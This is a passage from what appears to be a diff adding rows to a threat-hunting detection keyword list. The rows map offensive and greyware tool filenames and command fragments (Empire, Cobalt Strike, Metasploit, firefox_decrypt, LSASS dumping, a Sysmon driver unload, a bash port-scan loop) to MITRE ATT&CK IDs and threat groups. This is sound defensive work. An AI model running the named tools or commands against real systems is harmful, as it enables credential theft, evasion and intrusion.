","Frameworks","https://github.com/EmpireProject/Empire","1","1","Find-TrustedDocuments.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Find-TrustedDocuments.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1076","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*FindUncommonShares.git*","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","1","N/A","N/A","4","332","38","2023-10-04T03:52:10Z","2021-10-06T12:30:16Z"
+"*FindUncommonShares.p*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*FindUncommonShares.py *","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","0","N/A","N/A","4","332","38","2023-10-04T03:52:10Z","2021-10-06T12:30:16Z"
+"*FindUncommonShares-main*","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","1","N/A","N/A","4","332","38","2023-10-04T03:52:10Z","2021-10-06T12:30:16Z"
+"*finduncshar_scan*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*Find-UnsafeLogonScriptPermissions.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z"
+"*Find-UnsafeUNCPermissions -UNCScripts*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z"
+"*Find-UnsafeUNCPermissions.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z"
+"*Find-UserField -SearchField *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Find-WMILocalAdminAccess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*FireBuster.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*fireeye*commando*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z"
+"*FireFart*dirtycow*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/FireFart/dirtycow","1","1","N/A","N/A","8","767","437","2021-04-08T11:35:12Z","2016-11-25T21:08:01Z"
+"*firefox/FakeUpdate_files/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*firefox_decrypt.py*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1624","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z"
+"*firefox_decrypt-main*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1624","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z"
+"*firefox_extension_bindshell*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*firefox_extension_reverse_shell*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*firefox_privilege_escalation.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*firefox_privilege_escalation_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*firefox_smil_uaf*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*FireListener.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Firesheep/*","offensive_tool_keyword","firesheep","Free program for HTTP session hijacking attacks.","T1550 - T1555 - T1559 - T1565","TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://codebutler.github.io/firesheep/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Firewall_Walker_BOF*","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","10","10","98","13","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z"
+"*fishing_with_hollowing*","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","10","10","123","13","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z"
+"*fjoaledfpmneenckfbpdfhkmimnjocfa*","greyware_tool_keyword","NordVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*fkasler/cuddlephish*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z"
+"*Flangvik/NetLoader*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z"
+"*Flangvik/SharpExfiltrate*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z"
+"*flashupdate.ps1*","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*florylsk/NtRemoteLoad*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z"
+"*fltMC* unload SysmonDrv*","offensive_tool_keyword","fltMC","Unload Sysmon driver. allow the attacker to bypass sysmon detections (most of it. network monitoring will still be effective)","T1562.006 - T1562.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/unload_sysmon_driver_with_fltmc.ps1","1","0","N/A","N/A","1","91","6","2023-10-01T14:24:00Z","2022-12-05T12:40:02Z"
+"*FluxionNetwork*","offensive_tool_keyword","FluxionNetwork","Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) fewer bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phishing) attack. Its compatible with the latest release of Kali (rolling). Fluxions attacks' setup is mostly manual. but experimental auto-mode handles some of the attacks' setup parameters. Read the FAQ before requesting issues","T1559 - T1189 - T1059 - T1566 - T1056","TA0001 - TA0002 - TA0009","N/A","N/A","Phishing","https://github.com/FluxionNetwork/fluxion","1","1","N/A","N/A","10","4340","1377","2023-08-30T20:11:16Z","2017-04-29T10:22:27Z"
+"*fodhelperbypass*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*fodhelperUACBypass*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*foiopecknacmiihiocgdjgbjokkpkohc*","greyware_tool_keyword","VPN Professional","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*Follina.Ninja*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"*follina.py*muban.docx*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","4","387","57","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z"
+"*Follina/follina.html*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"*Follina/Follinadoc*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"*for /f %%i in (C:\Windows\IME\ok.txt)*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*for /r c:\windows\system32\ %i in (*sht*.exe)*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*for i in {1..65535}*","greyware_tool_keyword","bash port scan","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Network Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*-force-forwardableet-ADComputer*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*foreign_access.cna*","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 
Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","96","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" +"*foreign_lsass * *","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 